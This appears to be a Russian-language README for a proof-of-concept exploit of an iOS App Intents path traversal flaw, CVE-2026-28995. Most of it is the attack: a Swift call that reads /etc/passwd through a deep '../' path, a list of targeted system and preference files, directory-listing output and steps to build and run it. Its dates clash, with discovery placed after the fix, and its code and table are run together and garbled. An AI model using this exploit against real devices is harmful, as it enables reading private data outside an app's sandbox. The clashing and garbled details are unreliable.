
# CVE-2026-28995 PoC для CVE-2026-28995 — уязвимость Path Traversal в App Intents на iOS 26.4.2 и ниже.
Доказательство концепции для CVE-2026-28995 — уязвимость Path Traversal в App Intents на iOS 26.4.2 и ниже.
Эта уязвимость позволяет вредоносному приложению читать любой файл за пределами своей песочницы через App Intents. Основная причина — недостаточная проверка путей в фреймворке App Intents от Apple.
Затронутые версии: iOS 26.4.2 и ниже
Исправлено в: iOS 26.5 (11 мая 2026)
readCve(path: String) -> Stringlet intent = CVE_2026_28995()
let content = intent.readCve(path: "../../../../../../../../../../../../../etc/passwd")
print(content)
Путь Читает ../../../../../../../../../../../../../etc/passwd Пароли пользователей ../../../../../../../../../../../../../etc/hosts Файл hosts ../../../../../../../../../../../../../var/mobile/Library/Preferences/.GlobalPreferences.plist Системные настройки 3. Обработка каталогов
Если путь указывает на каталог, функция возвращает:
[DIRECTORY] Contents: file1.txt file2.jpg folder/ Как запустить
Создайте проект iOS в Xcode. Добавьте CVE-2026-28995.swift в проект. Вызовите readCve(path:) с целевым путем. Запустите на iOS 26.4.2 или более ранней версии. Ответственное раскрытие
Обнаружено: 1 июля 2026 г. Исправлено в: iOS 26.5 (11 мая 2026)